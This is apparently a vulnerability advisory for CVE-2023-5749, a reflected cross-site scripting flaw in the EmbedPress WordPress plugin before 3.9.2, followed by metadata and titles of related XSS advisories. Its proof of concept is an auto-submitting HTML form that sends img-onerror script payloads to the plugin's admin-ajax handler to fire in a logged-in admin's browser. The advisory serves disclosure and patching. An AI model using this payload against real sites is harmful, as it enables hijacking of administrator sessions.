EmbedPress < 3.9.2 – Reflected XSS | CVE 2023-5749 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<html>
    <body onload="document.forms[0].submit()">
        <form action="https://example.com/wp-admin/admin-ajax.php?action=lock_content_form_handler" method="POST">
            <input type="hidden" name="password" value="<img src=x onerror=alert(`XSS-password`)>" />
           <input type="hidden" name="post_id" value="<img src=x onerror=alert(`XSS-post_id`)>" />
            <input type="submit" value="hack me" />
        </form>
    </body>
</html>

Affects Plugins

Fixed in 3.9.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

3931daac-3899-4169-8625-4c95fd2adafc

Timeline

Publicly Published

2023-11-20 (about 2 years ago)

Added

2023-11-20 (about 2 years ago)

Last Updated

2023-11-20 (about 2 years ago)

Other

Published

Title

Published

2023-10-17

Title

MpOperationLogs <= 1.0.1 - Unauthenticated Stored XSS

Published

2025-04-28

Title

Ninja Forms < 3.10.1 - Admin+ Stored XSS

Published

2022-03-14

Title

Dropdown Menu Widget <= 1.9.7 - Subscriber+ Arbitrary Settings Update to Stored XSS

Published

2025-06-19

Title

ATP Call Now <= 1.0.3 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-03-29

Title

BoldGrid Easy SEO – Simple and Effective SEO < 1.6.14 - Authenticated(Contributor+) Stored Cross-Site Scripting via Meta Description